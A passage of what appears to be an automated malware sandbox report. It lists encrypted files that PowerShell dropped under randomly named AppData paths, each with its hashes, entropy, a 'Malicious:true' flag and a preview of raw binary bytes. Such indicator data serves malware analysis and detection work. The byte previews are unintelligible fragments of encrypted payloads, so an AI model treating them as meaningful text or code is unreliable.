                                                                                                    Preview: `Y.Y.l.o..F.I.W2....DbG...|s...U.4.S.Q;..Y......+...B.......cEBZn....x..u....H....6{.{.l+.\m....K...............8MXz+.....K.R....z..A...N.E......b..(oG...p.0...H...m..d`g<g't.M.......K.~W..-8!.*t.H9sx..2.l'N".:.f..g..".p..J........3z..{.../4...T...%..k.w#.fA.I...2R..e.D.@.tg.\...F".N/..UXgw.w._V....&,......U."......D.F.{.A.....9.....kz5D...v...R........e........6.~\....Li..5.E..!.`..{.Bp.F.y..\.Q.8.....+...C?.v..j...'.+.<.N>......^.'P....h.'.....O-....#.;.\.OvXY.*|.=.|....:...A.....K.......vK.._7.n.M.!....^....5.l..;.$FD.ao...]..t[..)..m.p.}6......kJ;......0.6N.W&...a;o..+...&oB.....i...oZ/.l.,.h../.dUp..}....%FR....q.fXd#?..U..1.6oiE./N*z.f..&...M.......q....EOL..E.EGp..@......+.Hql9c.qd.T!]...l....v~u.T0...3.;$0.q>}.<..3.Y..JTd.$i...b.2._...9eOG-.%...A9...........u..L<.... D..&.||...(.`...d.~.R.P.v\....M.A.....>{......3.RK..k_0.....9(..j.}$..4?^L..Yrp~<jF06.}Z.I.zs{...i...|.b...9e..L....."qqO...........H..j@z...&.../..d.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oQGwTmSRbnlOWZj.EjAidlJqhstwzBQ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):172327
                                                                                                    Entropy (8bit):7.998950369574349
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ZJHz/UH9qMmxRU7vq2l9o25nhQLoD/liIqSybXGXZhLx88:Z5zqbeR0q2l9o2phL/ljyb0x88
                                                                                                    MD5:8F8D6566323DCA0FDC81040C3BF24CE6
                                                                                                    SHA1:F1D485B3316C57942804FB191276423680312F98
                                                                                                    SHA-256:9B646D62A3E67D09A3E1484C9A25C44E9640467AC40735D87E7EE9960BD1A0CE
                                                                                                    SHA-512:EDAEE1C56E7801657A7F50E8FEA2AA44E29A7D18C14E72062DB9F2ECDEC977A29B3E2D47A1BDBA542F70CE37491D452D585989095F79BB25F7A833912ABC65B3
                                                                                                    Malicious:true
                                                                                                    Preview: f..f..w.V...[.......d...U.f*....F..D~8.....Dn9Z.NS..ee4.....,..Z6..W..5..EvP.G......e-..B.....7%pU.J3'0.ZN..u..P....3.#*{1W...f....3.8.R.....1..V.+\..p1........~.blF..b&o.....p.D;/..f..i..$..xe....EAu!..#/@.+6TG...zQ`U.$...j.%)L......s8d..(.s...r8.T.h.di.D....z.H.).A.n.afD2.^....g...V.o....'.$u.k....&...%...ya.......v...T>L.6.%..?... X...b.j.....{%...g...TT..E~..z..>2/..g~r..H...Y...N-`...[e..@..+_.d.}"q.B..T...N.....!..@..}Yp_.B...;u.C.G.V....D:a.N.C@y.ps.`V..a.YP.m.h%,.!..q...6.J...o.(.&D..V.@...q.(.h..Y.v;L..xm........W.2..i.2.PIP.:)Y.........~)...&6.W..jF..^....?.....I.$ .u...G..<.g.FA:4~S.>..gA..;.7.@...................".u..bH.7..\...AD4....c...j#~..J%...tn2.$T.%'"?.C..[o..o.%.^4d.f.($..tp.ro.m.G...d.X.FGz.:....,..g....L1...i.A.E8......V.9.|..YE...+=.@'.F..V|..-..o5...t.lO.2#.u...jC...\g1....)..p..D..n...r....M.Q..0...%0h.^..jw^......\3..|...Mb~.....kS.]....X.o.....P,n.>..?.#8R._..UV...!..S|...w%..]I-f...8..9..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oVvsglHIGE.ctNTahrQzfFRP
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:little endian ispell hash file (?), and 7937 string characters
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61630
                                                                                                    Entropy (8bit):7.9968412962934385
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:i21Q6V35fApck98fmk6t8LGsbZkxKvdgU3ToljO3S:Tt9ikY8LGsVkxKVgiYjO3S
                                                                                                    MD5:4BDB45D282387882A0C3B7A0F757E1C1
                                                                                                    SHA1:F79DA8C12CADBA11F567A344383924D7164BADF3
                                                                                                    SHA-256:BB1223A2E9687617E04144CC6D5122AEF23214ECD3D5F0233FFF4AEBFB9B753E
                                                                                                    SHA-512:C45312510C41B45A6910EF5D3764E7F76EDD6DB0F14116FCF963FE7F89875045577656C44570CCD94C9CC07E3242B583B7A2332F41E03368A68485FABE3E1821
                                                                                                    Malicious:true
                                                                                                    Preview: ...6..........K?..`...L.rY."j..FWa..1r.:..Q.....k].1.v..L....~..X.......Sv<..\.Q....{.+.l...j..z.4m 3.P...m...j.~.v.C.....0.................S..A...-..'...Z{....tXz<`eiF....F,f....j.X&:.N.$.T..%xq....M....S....Tj@..T....!....!...ro....I..0..<.w~.qq....,.K".1...U49...>..h....uj<%.[..t......!.|=.Er.3../.G.9.f..z.ou.-+..J..6.{.7....'.Q.,..FF..Fb-....q..4T.....u.......f..~......`N..%.A.>.h..c!....O........$... ..X.O..X..2...\..?.E.N.Y..........r......<...!....1J].9..^..$....#.?.s.vx.[....w5...ls.i.t.Ou..bz.k....[..W...D...HG#.J.<.F..'...DL;._...1...;z.0.?.Ea>h.....G.=...Y..i...\m.....P.........a.4'....K..&.cl.<..i...`.,..e....8.YY-.X.....{w...Rt.)s.$a...B.Eo<.3d.nO2..0k[>]B.c..4.N..v.n7k.C....$.=..@.I.'..-tso... Hlu.?.....;y.#&.....%..M...1...V..8....W.RV.m.PLa....#..e..!...t.B.^..aV./K9.....sVc..i......e.V.X:m....z.l.....|l.p..Q.X0a.A.....:..5.~I(.9#.|.C.q...V..Th?x8......FhP&.Z......].2.#.."..?...>...~H*....../...._UZ..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ojPnURfFIOLWAsphq.OPbdGKtvhCQlzA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174593
                                                                                                    Entropy (8bit):7.998875958508988
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:6s33qZlkI7rKwJ/ge9mpW4X9+wjdITJbdXflbHsIai3ng4/GFSozp57Vi7pOvq:oHIW4X9lAtdXflHdnXg4/GFXzD7c7pOi
                                                                                                    MD5:9BD5373D030711D66AB4446B45F655A8
                                                                                                    SHA1:529E6A4F4EAF226630EA0A0DB7400C791B11929D
                                                                                                    SHA-256:5A478ABCE783B5718F58A65078FA53ACFA9D2496F633F8C08A3B1AB3544AE66E
                                                                                                    SHA-512:FDDD58EEC032AA113226A45C3038028C6F82EB1A7E5A3FA21C801F50C7957DF1BEF46CE610E3EC6E5950839AFA26D884EC47F68C9E23347C9BB872EEE196F331
                                                                                                    Malicious:true
                                                                                                    Preview: p@h...G-......L3Ks.E..<:.-.r\..1\41.1....7J...J...AY7+a...wJ(YS.w.4...U...*R`.'m........X.33..".A.)0..X.._f87.h...4..c.z....."U..s.V...vM.....f.k.....3.J..#.V"...h.t..W.4.^..H0....+/@3.*....;..d.^Y..B.k..,......FMV8.A....&=.#...<N.z1..._...6..K.+ .T4Ay...[...d_....%t.%;.+}../9..ms..?.]..Y6b.8I.$/w.......NV'D+o.6......o4...4U...z.>."...n>-.x.@]......Z?..\".,.p5...x.".p0.(`...?.U..)..z..U......W3...g.S..5.K.....9|gu......Y.*~..{....6cE.....*.B.M...1..L.e,..zZ.)JIE.0t"C.u..e.?n..j,..Z.e,....X...j]...p.N.)G.....X[.P..vF.......x.KV|aix....;...Z:.:..N.w..d.P.....e.A....pk..@.f....[......GA..m....}.WL[.0.zrv*..Hr.h.<.8.}..K..5..Trz....`bC....)>.pP......R.Y..A.#.&.c.Ip.}.0l....B....L......\.pi.p...i. .YV...L;}].w.8...|n..q..x%}..a.L.._......I..........*'..n|...0....F.D $st..l.E.....`QQ.nC..>jp...~..F.O_....x..)......CG.1.......U7QQ.*.9.s..b^Bd.`t.P..n\.......-Z...z7.x....:..j. T.lj.f.c.*Gt.e.k...o..[R..YO.Sk.O..T.@.X...1`......@'^..WW.J.9..%O..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\olyGLuEsqpXQOTKD.rRPQajxdwK
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85501
                                                                                                    Entropy (8bit):7.997533291643169
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:8WNcaSzj62pBlvvHw9D9kR3LkgFsnawGl4YaiU04yg7JQlXaegvGg5d:ntMddHwC39sOy5k4ygOpa/P5d
                                                                                                    MD5:7ABE9C0A430BF4A86EA4EAD41952401B
                                                                                                    SHA1:D6CBF0D2C6D6620CCDEEA214EEE7FCBC2852F088
                                                                                                    SHA-256:9DCDA4F8769D5E523FA922642A696CDED41C31C6DBEE26235B30DA345214F563
                                                                                                    SHA-512:A4C6C4FDB6954B6A21A03FBA03BE14EFEA012A7B169BB4DF2A56B2BBDB9BA3D8A872E1754300918709F6B50BEEEFDBF020444544336C58E025C3E3745C324ED5
                                                                                                    Malicious:true
                                                                                                    Preview: wH...K......+B!...'..........$<=..H%V....h.....k<.Gs3H..7......GL.ff\O..+.:.'....~..kir:i.V...pD.~.g...lDG..G.8...w..Q.<.+.0.G:......]o.O.#Nd......a*0..si......D..c......8.K)r>.gWu.Y..R>...B.,.-.qc.L`....0.q....oy.]S...(.p.5.M........,.Q..*G.B.mV~...v8.;.r%.S7...x...&.d..._.-M.....'..?.|...y.S".E....lm*..$D...h..l..U.KlB.) ....F..<.7.Z.Xu..{.{.d..nk.......Q...EQ....'.)..{V..&..H~m.a.,X......u.*>..~c.Dw.!8<T.@6PP.l.X....e............5.}..=.....:.....!3.x.VA..!.5..o...pXl9.........M.`.V..lCH..p.b.\b.t..l.G.......x.3...).o.m.].l.V..f>k UX... X...R).....dRM%..T.W.......=R.hN...r.|..kP.]A...2..34.z6..aBa.5.5nq.X..J.c.C......5.-i....f@......`..S.....$......l......tD./.....P..S..0...u;z.t...O..[.g..D....+.A..<..d.X..W.n..."..'.2"..hO5..Ib...N.....i..K...&.L....V...'Y.0....1..L.`])...h...<@F....9.">.jtU.[.8.j.=[<.....P33.....#`.*......XG\0...l$.vr..v.eeu..K.u.....A*h...7......h#X.>..^32.D...BE.X.K.4/..5x.\..."Q..G....5...f..g.....$y.{..w...D
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oqPfYvAlZLiCatc.UlXcqgCxzwSZjNJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):166576
                                                                                                    Entropy (8bit):7.998844042913613
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0S+7PTlFDgsFAYoFpqeZ2ppyABOaH7gVEVtY9cvrWtZFk3MQBNqTd/pQ+1AhodK9:L+tFDJFAYskRqqQc3kZFk3M0qT902SL
                                                                                                    MD5:53A4B58695945BA88B1FCECC90157A32
                                                                                                    SHA1:A090BF2B23A999984CDF4A89E894880145282E6D
                                                                                                    SHA-256:888467106039353B3D8ABA149B145805F9F8EDCC9BA61B994E8F1E35F67E4D03
                                                                                                    SHA-512:BA88F8F1516E720D85E4EFC07832F4572A1F2488598DED5DB30B4605CDDEC77B19F4D5B6BCF99C32914635FDE4F884001049512279E19070DF46A3784500CF68
                                                                                                    Malicious:true
                                                                                                    Preview: .(.....{.*SX..H..4K...B...(..!U..Vl.s.o.j...q.)..;KW.L..K.R.2..=.vP...=4..........{(..b....W..R...._......1A=P..r..W.}#;/..a....y.:}..a-...1^OEA..w..DM..#_s.2..i3..(/ia......a...7V4\"....KY...*........y.[.G.....32.J|...sPr..*.S.4';..:...N(.A.:..L.T&.4L......,N.Z..)....K....c..eWn.4.=Nn..3...k}..l.).p..#.l..80...%.l.4..,.......)....:..*.H....&..W...t....W...N..t.1).o.....w[..D.F#.m.s...$....|zk....3..6N....AWv-._{}.n........Z.|.S..7w.O.s........Z=.WNC%[...,F....F1.Rgh......l."{H..V...o.F..S.h.......}&&O....J.A....5.k.{"3F...4f.,a....0..P.R..{m..r.U.'.I.yP....W..Q.ZJI...'..%..Rr..~.Pqzjg5.3.a..v:(pmv.1h....4..K)ltM...}*g.._8..>.*.....R...x2`.|7#.)0N..K"".X....=|...x..rG!...)%...a.g.`....>..="h..........T...u.....H.T.@c3^Mt...G..%.....p....B..\L.......2v.58Na....+.h;..bi..k^...B. .. ,.K.V.h~..a!.,....h ...:.?...........lY....f.v...0......@....I....]q........>&C.q{.),....o.B....y`...Vba...^....Uf.V.^..k R!f!."...i%V.3*M....n..w..#V@_.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oxDHGkPWXzBOvitS.jEBzVfvaCWy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87542
                                                                                                    Entropy (8bit):7.997999708820864
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:d7sssp1qnNvkSU28r6puJBcW4Ztpk/vRNSAVYBJ75Ot0VcqBWETQa1K:d7sjQnZM2egxtpk/ZNSkYn580boETHK
                                                                                                    MD5:FD43A2342F51AA308CFD7E4A6226E79E
                                                                                                    SHA1:2AE74F268947AB71B2F175175A42009F1B21464E
                                                                                                    SHA-256:5CD6F8DB4947F4C41AED22D9FA10F2A995786200AA6D5283C8C6BC9282361299
                                                                                                    SHA-512:AB4A3B2BC84132B9403CC0704E49FAE7695534D8EA500F1BD07F12F1DF8181B9B257A0C0BAA377601BBA1595597C18004924BB6B6D2809664522A0DCD1C1CBD7
                                                                                                    Malicious:true
                                                                                                    Preview: {M.....:TC.&.....\.{..2v..\5.L.C...m.21.av..I...DC.J....-....L^.A....}.*..:^...u.4../.. (..Cg......8.....p<vx. T..V.Ip.c..H..,%F....Qw.d...V#..{.&Y.3..<n...P2...G8..m...<4%.....q)&...TY}.c.t....@.P.IE.......>..."...6J..L@...)..0>..<E.....$.b..........l.......:X.....h=.(...,[2....&.C.A..P|(..'v..A..L.....`.Ti1.k.....v......=...=...t!g**..X.Ed..a....w..X(."....`....I.W......P..`..s/.a.q......A]......r.6o;.......1.q?.:..0>,.mf.%._...RM.{oy*.4....,..|......B../6..5.........-.2c..9..R}..].U...J..j.6{.M..3.uv......1.w..C6p...v.Q.[-....f.J........U....E..e..`..%.i.....V.mi#\>...!.2.;.A.........%..#K.....].......-..49. ..b.d....1i......C..F_..Y.U`G.....UM.s........... 8..[='q....Q..b.Z.D..x.;.PF^S.K'.......h.i....&kI..'.}-..v!..n.6*..Y.i.h. pf...[ ...{......q..v\....w.g&...~..e.de.*..}.y..d......R|*.....cq....4..c\.Ptf...+4...B.;9[.Q..h....a....V....XZBr.=..........H...]..........3t.M..0+.!.....*%....4gpZ/.?E..Y ........;...0..y.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pCcSxloMwaiItLhdAyg.JPuAMbnZyYIWz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):95693
                                                                                                    Entropy (8bit):7.99804695336404
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:tlwsEoHlnPms+1RbWN5Nfgdzv9gzD7s19INm8Jv9vqld/yVgAlEs/T/6W+s9Yqu/:4sLPIM56zlgzPs1im8DqH/mgvs/T/6tx
                                                                                                    MD5:C98F542A268800B807B257CBBB48F31F
                                                                                                    SHA1:ADA8C77BF025CA29708F6A8430DB546B0299A7FB
                                                                                                    SHA-256:030A016AE190FB63789F901C8C8DA2FFC9102CDC66C111F212D424BC384C7EB6
                                                                                                    SHA-512:B212F04E6A86EBF2C1D5817B73EFA5C339E65AA62971CE7F28A759F971C8570DB4947A3E8D0348550E6E123D7906FD8BEC2EA0298DCED1B32B1FAFC44D3BDDEB
                                                                                                    Malicious:true
                                                                                                    Preview: ^..t....h.B.......V.;.......T.SyVB..[X.UX.3...-Y......#;.z.d.+....Uk..|4%..u|.c...,.........no.,.B.....Q.."..........Nr.L."..?y.:C.b..h45..lr.....,%U...u.......6...X.:.Y.(.A.UL....e..~*;7.._......Hj|.@x...@\K..e......n.R1.?GTF..Ewe..O.ap.g=.-.12...H..H....v..xYb....>*.w..GD.I"...3.h)........."-.u.H...3.j.8S.&3..9o.GJ.zmP.".8...+Kt.rO.5e....*h.N;.il.%.J..G.....n..P...bd%O3O.q\<..O.'l...3...0..P....8...].5..,o.)}..(...mi..l. ?|4..0@...[....a....n.a.JyxS...*.HY{xX.....j#.M\`Bd.M.x...\..kf.c..h^...!..'.*.....v... qy.a.l...w..,H.V> ...e~..T....%.l._.2...*&...~~.j..0..."..|2..Q..`..O.....:X.ZnqnZ}..;H.d..>..G.....;_..F..!'@..Gf.._.-5kZ..D...p...n.......2....n....fN......Wc:(Ha.jWws...yc@.~..z..O....1...I..... .$;'3Y.N....W_./Ybx%.......x.4.c.'..T.....lxG.iI...i*6.+.S...yo..J..$B..Q.V1u.....rb4....rE.<.............;@.l.D1...........r.c(.......p.$s...s......N......f7..|.S<\RB..(.0.\h...w-..m...[..;.....j..^..ZL.&T.z.=d....Q...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pHrCdQLUzWDGOEcNsh.AiCapRLtkEcjQPrFHw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57303
                                                                                                    Entropy (8bit):7.997118109138539
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:85fIQQ4rFs+UFW4EXbIDam7tVbK0zwyQQ:YfIR48FWRYaot9hcyQQ
                                                                                                    MD5:4449501147C04D47398BAFFDBD519FB6
                                                                                                    SHA1:EAD04E94252E99FC0BA5355D27DEEFA5037F871B
                                                                                                    SHA-256:7BE1C406D2EA0BC9CE742B3902E186F7C095460CE4F23149B235E95B30560D67
                                                                                                    SHA-512:26CA008D0D44FCF241D369851EE79AEE708A1BCCDBD292A804D8477976A8CC1B83734D3718E24C53D67E860E449244C07F57F4909E119DBBDB09B1C338FC1B68
                                                                                                    Malicious:true
                                                                                                    Preview: ...7.M....w..A6...{..P%....w....7.....@8.8t...$........@.D.,..y..!.a.?.B0E..2.$..2E.t..)......-..Q.~W.x...s..* .m..4N.y.7te.....ubTg;.5....-...+.T.b@H..S.b....F........W-......l%...4.kG..........#%.5......k\.....Vm.....y,tC.."..F._'. S{1{IA.[....yx.g.....1....Ga..X`Q..{/...UC:....~P!p>..b....a9.'e.2....Ba-\.3g..../0N......A0.*......|iy...L......_..4...(3...1.2..b...]...r.9.;'.p.!.Jy...IU.,.../.I/...bA1...`...U.T.tj.....P......\..w....`.DSPj...d..t`5....:[Q....sgH.Q.Q......^.....|^..........[5o..!#.7q&(*.\t[...m....z..3..(.;.\..&.j..._...... ....&.]@......8.>,....L!!74.K.....Q.G.6G..x....b..u..2.....Z}..`..A.........>).},2....n..S....n.~.aP|]..]7*<.M....aD....2.....r..:.Q..k<...2..$.(..h..}I.$.\...8{.f....{M-.H<.....e./>.HFM.P.h.c#../...[..I ..K$c#.K..F...c..7l..&.E.N..s....&jM.r....',.~g.....p?...d........P..%2......A..7..S"..z.....L....s.r.o7..C#-..$.Fm".....C....9.s.O....B...t....y.K..;.....{...v.$..7=e*..'?..Cz-".E..3. ..c...D9....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pIHzwhWPoCtJyQMcdYf.QXsBZLrWyiYldegSCU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126653
                                                                                                    Entropy (8bit):7.998428656000752
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:n5i3WXhSlYEW0uKxLmc7bFK1alIWH9vwvVK4wmkgBb8dI:nmWX07R5/FhJHtq2BgBbf
                                                                                                    MD5:3449DD5972BCE42BE3B5D3A860270783
                                                                                                    SHA1:E19F14A0D4C809DA226B4D28C9B4D8D132B343E0
                                                                                                    SHA-256:77A9E59C4364624F0498C3FDB65F3FA7B479F7D5FE5A9CF10FA8390FE6A1EBC0
                                                                                                    SHA-512:8A903AFA8E1364F0DD4B1F07F85B48B02EE28429F0FA4E14D924B4EC07BA7D7C08694FD4E98FA9E345D973D2416382E978CE547494F0B5F771442D65FF8A4395
                                                                                                    Malicious:true
                                                                                                    Preview: X.*.....2.iz..&x...Ta.g6w...v.Z..8b.p`OJ...I.`.q.........u,...~J.cc.!..U...2..7.v...5.A.B..#S.=g.f..P.{5..hx....6.f.{yK"..w.1o...NRE;!&...s..?5."/.QSC. ...qF..R......._r....I....RU..b2+aK..T. .D.u..v...R..f.K.m......\mWW..K....3...Ib.^W.....@D. </...H.?H...4r.}...u. ur.U....W.....H.l......RD.X.8.i..x.;..v.._.o...zJO.....mrAAFe...\..j......I.t....b.......sV/&.@r.../s=I4.w......_.s5...U.`C.}dh&..`{..j$...-....O..s.Ds.......x.,...N.....w.....(..DV*.*......(..tUw...{... D.z..F.b.$.s.X..I(.kH..t8.`..L.K.:j}W.....jT...:...6..;....}.&?..(...........V.l3a.O.J.BI...^..+G.j.o...n<..1*...~.'.[U...G..4...3.?...Y.......M......:.l.1....R....?4...9.xid..M.=.........0..'...Y.9V....m.$j.Tifw}N...m,I.J....Pl...z.a..y...ldc0.F..qG<..Q<.*...@...j.QS.I.E.n.t......[[......nj"....Z...IM..j..?cG.qh..&..,.].:n......1v....).s.A.m....4.X2.O.N........yAr.$.:P..s.../.....`c>.O...T'....?v[......M....}.gm}...9k*-.... .......~~.....Vc..Is.)sl....e..-8....i.n..[.8.A..O
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pIyjDcEgAxKfHBMwWn.ibgdoSxBvJXpsO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):159333
                                                                                                    Entropy (8bit):7.99889357619552
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:avi7y8ktPcATF2X21qYPHoi32GEZuiyOxtZAXl6iSz0PIc:a2kcATs24YtjIxtZAX3Sz0PIc
                                                                                                    MD5:9BF6106EC9541D5D4BD7A4384EEE9D92
                                                                                                    SHA1:76C9D59F233CF238D479F6A92696CC40C8F81D75
                                                                                                    SHA-256:A08BC5B8BAAFB0D474051A54FF2CB0350C229A09271225E1F91BBA0FBC23C733
                                                                                                    SHA-512:89171E1F710CEFFFB0E150D663000292E4AA7DB49F5D308EF0C8B8AF740139D66E927632D19756B24806716FF3F611423F96EB9C3D6663A9ABB428CA00375B15
                                                                                                    Malicious:true
                                                                                                    Preview: X..:..LX.(V.u.=Z....ET..S.2j...n#.....'......$l.]6...Pv,.Pg.T.p..m....o.'Z5t/\H...].67s.....(d'..|..0.=&t.A........%6.7XG,.@.\1.M........6.@..!....3..Z.E.[......pj.6R..J...,.b..71{@.)KC.P......{.Q....r.aZ.N;.......G..T...r.`.z.9..tu.....29.....>32X.GoE.I..._..5V....5.!..).[.....2.-^...0e.B..f....F7a.FQ.......&..y..%...+..<...g............3V.....b.'oiHG5.^.....R......`0.*...4.(c.t...@...j=....;,...w_.?...`.*i..w ...\S.....*o.......(..Z.").4..."C}G.E.S.o..L[.l.."...O....9*A.K.C.+......x.....s..IkN...qWWx^).:..R...D`...}....lF...7/3NJ....T..k.......].b.i....Z7h`L.......y(...{O....r.:..)H .....U%.........A9..K..ra.H6...m-...3&*x.....nG..i..u...0.$.=X.w.../.....F..}..@...Y.x.2..#..}......o.Sz...k>.....=...._.~..."..1c..|...iO2.t...1..r.3S...Q.~...c.o.3...8IM9.o...0..6.....<k./.R.T6..2.X..:...N`&S#MO....q....j.>..a8..n-J[...I.EA.....i.....=.0..}.'.g...v\qXZ.R.^(......UJ....+0*x[.4.i.#.P.gF....Y3...9X....-..E(/...*N.y..c......o.$4.!\y.......?......."
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pUOKADnHErWscxtiIF.xgGiJHEyhOkR
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196286
                                                                                                    Entropy (8bit):7.999073722353039
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:fX2jbmJjRxPCiT9Lb5INx1XOoOQOufqFv4lanDPmSFTlnuWpVXcyAPy3GGL57bCH:fX8mJ36iTcxQoPOMq4WdBlnlHNMfGLZU
                                                                                                    MD5:4EBFEC46FF942C963721EB7765FCA6FA
                                                                                                    SHA1:7EB7269B64C69A28E5B102B8262309118E8F2654
                                                                                                    SHA-256:874A62945638F048B3226D7FC8E223DC14D7E9D974385A4739076386DAD2AEB3
                                                                                                    SHA-512:809140900E9A30A4AF6F598A1E3ADD0743B270704A31C155439D381E200D53A5CB5C5F54833A897076EC7F9625648F9415501ED0851AA7DF79A3FF4AB722D377
                                                                                                    Malicious:true
                                                                                                    Preview: v....a.^....0f........`_.t:$.Nqf...)".r..X].....V....[.M.A.r..E.....#|..Q.....B.wBg..... ....w.N.N....\.<?.0'T{..yX.....E)..-..9..Z.;e..3.azk.7"...J.4+e.^.DZ{F..=..!....*.. z.^.....`n..?..M7...-F...6..h..D..%.z.6.....,..2z...K.......k.... Y....f&.O/...e..u..K....[.y.P.{.xv.6..%.].,.0t.b...........Gi..Z*..&>...7z$......d`R............T...x<C..... .5#.0.~..Z.O.'.TCk..P._.. C..2.=...n.......(2._Q.1.n....V.;.'......H......`...[=.m.,.[..E.O.^...%..kXb..P.....W{{&.B.:X..A.o}GI..a......F.(.|._..D..1..V..h..`.Y.....Q......hI...[u<.^.../T.....g...L..?.[....R...R.........~+..H.?F........A.T...v3i#...L..,.WT..............<..1.f.....m..{.2....*K...6.j.9M...c.@.,..q;.Bw..R........0....F.....J...3.w@...N.....c..#$*|..?.=O...<...8.RpL.~..`D...=.B...^....~Gb..F..DF.[L.0.mEF..gL.js...b..Q......v..A..].p......um...........?w+....(}.kvr.^L...g.aj....7*.'..]..Bk.L..L.o.e.HR.(....'#.N.R.D.....sF.lp.q8AGhz.rV.+....H[......d...Y..=U..O.wp....5d..Tq...hA.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pkfyjRWtwVO.vtdVMXcwBxhJyTaq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):145804
                                                                                                    Entropy (8bit):7.998927737168523
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:IgSly5RDvMMGv0hfr341cAh/ZS5pfbLng2Uwjnuy9Ixiaszs6:BSCo98hMm605pPnJunKzs6
                                                                                                    MD5:3316D8CA0E7F1A18A55F9DF11D9E8258
                                                                                                    SHA1:315E5E1928EDC7852A2253C427B215C542DBCAD1
                                                                                                    SHA-256:10EC3E6AA2C0B536CB4E30D09E9D65AF33D6DFC4755AA84A9E68E87D1CE6F96E
                                                                                                    SHA-512:E6D01BADDD4702B622BF3CEEA9394192EAE2C06ABD987F7619A3122B60A4C59017446CFDA43F8E0F88C66E7D8C6E5E5B8BF08374ADCF2116A4083AF183948563
                                                                                                    Malicious:true
                                                                                                    Preview: x....y....T%.W.>.H5.a...3@...{*.X_~.".D..Mw...M..G#.`.5.*l9.\/".J..#....u.".7...gX5...I.....F.U.-.+.+)....3.4F.........%.........d..;.D..76Tw..0.U.2.W..?.M.`..E2b*...r;..XF..2j..A.U..1.5.L*N.."...<.......C.WX.....c.w..iV.%.{#g#.6O-..R..&....45...F.z/q5.{...."v....TCQ...x1..Fsyd..w..f.sM.i...f.k$.<j...U.....0cp/1..5....<.. Y.p!.<......m.x.I8.I.4.U...A.4.7l..T&vd6^..E{hG.]..i.}.2..q.B^(P.........K>., ....^5...w[..j...`w.].Sz......[gPq}zY.@.l(... ..i.%...qiAZV.&D..+..v..n.YA[+.5...e.5......B8.'....(.-.nG9.dFx.$.x..l.W%Gjvq. L3.h.......L.nr...I9.q..).n...40.....}&X.......e.af.L._(..2..C......j.B..u....k1...Fsex.M..A..:>.Vk.K.....M.MY......"..Y...Jz....6l.(M...~^....o4..3Lp..I.|0..g...2..Q..82..=.h..O..y.N..".....'.=Q....x.P.1!>&H...."..jb..%Ap+.P..x...Ma...g.u..g:.CG....LFa..6.W.Z1U..>.Cc..~>~=.55...Yw.Sq.o.p....f..S.....O....3.........{.."..C......(e.i..}o.>.s......0.Tj.F.....Q..O.Y.d..3..x...k!....3..?.>..O.H..>.~..^..H...5@.........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pqNrZDvUBGJei.TQopRzkgmVJhZD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):109042
                                                                                                    Entropy (8bit):7.998066262095429
                                                                                                    Encrypted:true
